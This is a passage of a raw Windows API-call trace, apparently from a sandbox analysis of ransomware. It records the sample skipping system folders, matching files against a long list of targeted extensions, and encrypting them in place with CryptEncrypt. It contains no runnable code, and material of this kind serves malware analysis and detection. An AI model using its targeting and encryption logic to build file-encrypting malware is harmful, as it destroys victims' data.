(pszPath="Setup.xml") returned=".xml" [0026.178] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0026.178] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.179] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=5884) returned 1 [0026.179] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1722, lpName=0x0) returned 0x230 [0026.179] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.179] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0xa0000 [0026.180] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.180] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0xa0000 [0026.181] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x16fc, dwBufLen=0x1700 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x1700) returned 1 [0026.181] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1700) returned 1 [0026.182] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.182] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.182] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1722) returned 0xa0000 [0026.183] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.183] CryptHashData (hHash=0x368430, pbData=0xa16fc, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.183] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.183] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.183] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x1722) returned 1 [0026.183] LocalFree (hMem=0x36ea40) returned 0x0 [0026.183] CryptDestroyHash (hHash=0x368430) returned 1 [0026.183] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.184] CloseHandle (hObject=0x230) returned 1 [0026.184] CloseHandle (hObject=0x22c) returned 1 [0026.184] CryptDestroyKey (hKey=0x3683b0) returned 1 [0026.184] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0026.184] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0026.185] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0026.185] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.185] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0043-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0026.185] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0026.185] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0026.185] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0026.185] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0026.185] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*" [0026.185] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0026.186] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.186] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.186] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.186] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.186] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.186] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", pszFile="Office32MUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0026.186] PathFindExtensionW (pszPath="Office32MUI.msi") returned=".msi" [0026.186] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0026.186] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.186] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.186] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", pszFile="Office32MUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0026.186] PathFindExtensionW (pszPath="Office32MUI.xml") returned=".xml" [0026.186] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0026.186] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.187] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=1383) returned 1 [0026.187] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x592, lpName=0x0) returned 0x230 [0026.187] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.187] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0xa0000 [0026.188] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.188] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0xa0000 [0026.188] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x567, dwBufLen=0x570 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x570) returned 1 [0026.188] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x570) returned 1 [0026.190] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.190] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.190] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x592) returned 0xa0000 [0026.191] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.191] CryptHashData (hHash=0x368430, pbData=0xa056c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.191] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.191] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.191] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x592) returned 1 [0026.191] LocalFree (hMem=0x36ea40) returned 0x0 [0026.191] CryptDestroyHash (hHash=0x368430) returned 1 [0026.192] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.192] CloseHandle (hObject=0x230) returned 1 [0026.192] CloseHandle (hObject=0x22c) returned 1 [0026.193] CryptDestroyKey (hKey=0x3683b0) returned 1 [0026.193] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.193] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.193] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", pszFile="OWOW32LR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0026.193] PathFindExtensionW (pszPath="OWOW32LR.cab") returned=".cab" [0026.193] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0026.193] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.193] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.193] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=2928955) returned 1 [0026.193] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2cb162, lpName=0x0) returned 0x230 [0026.193] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.193] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x2c0000, dwNumberOfBytesToMap=0xb13b) returned 0xa0000 [0026.196] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.196] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2cb13b) returned 0x3240000 [0026.198] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31ce070*=0x2cb13b, dwBufLen=0x2cb140 | out: pbData=0x3240000*, pdwDataLen=0x31ce070*=0x2cb140) returned 1 [0026.252] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0x2cb140) returned 1 [0026.280] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0026.297] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.298] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x2c0000, dwNumberOfBytesToMap=0xb162) returned 0xa0000 [0026.299] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.299] CryptHashData (hHash=0x368430, pbData=0xab13c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.299] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.299] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.299] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0xb162) returned 1 [0026.299] LocalFree (hMem=0x36ea40) returned 0x0 [0026.299] CryptDestroyHash (hHash=0x368430) returned 1 [0026.300] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.300] CloseHandle (hObject=0x230) returned 1 [0026.300] CloseHandle (hObject=0x22c) returned 1 [0026.348] CryptDestroyKey (hKey=0x3683b0) returned 1 [0026.348] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.348] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.348] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0026.348] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0026.348] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0026.348] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0026.348] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0026.349] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=2362) returned 1 [0026.349] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x962, lpName=0x0) returned 0x230 [0026.349] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.349] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0xa0000 [0026.350] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.350] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0xa0000 [0026.351] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x93a, dwBufLen=0x940 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x940) returned 1 [0026.351] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x940) returned 1 [0026.353] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.354] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.354] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x962) returned 0xa0000 [0026.354] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0026.355] CryptHashData (hHash=0x368430, pbData=0xa093c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0026.355] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0026.355] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0026.355] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x962) returned 1 [0026.355] LocalFree (hMem=0x36ea40) returned 0x0 [0026.355] CryptDestroyHash (hHash=0x368430) returned 1 [0026.355] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0026.355] CloseHandle (hObject=0x230) returned 1 [0026.356] CloseHandle (hObject=0x22c) returned 1 [0026.357] CryptDestroyKey (hKey=0x3683b0) returned 1 [0026.357] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0026.357] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0026.357] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0026.357] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.357] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0044-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0026.357] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0026.357] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0026.357] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0026.357] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0026.357] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*" [0026.357] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0026.358] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.358] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.358] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.358] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0026.358] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0026.359] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", pszFile="InfLR.cab" | out: pszDest="C:\\MSOCache\\All 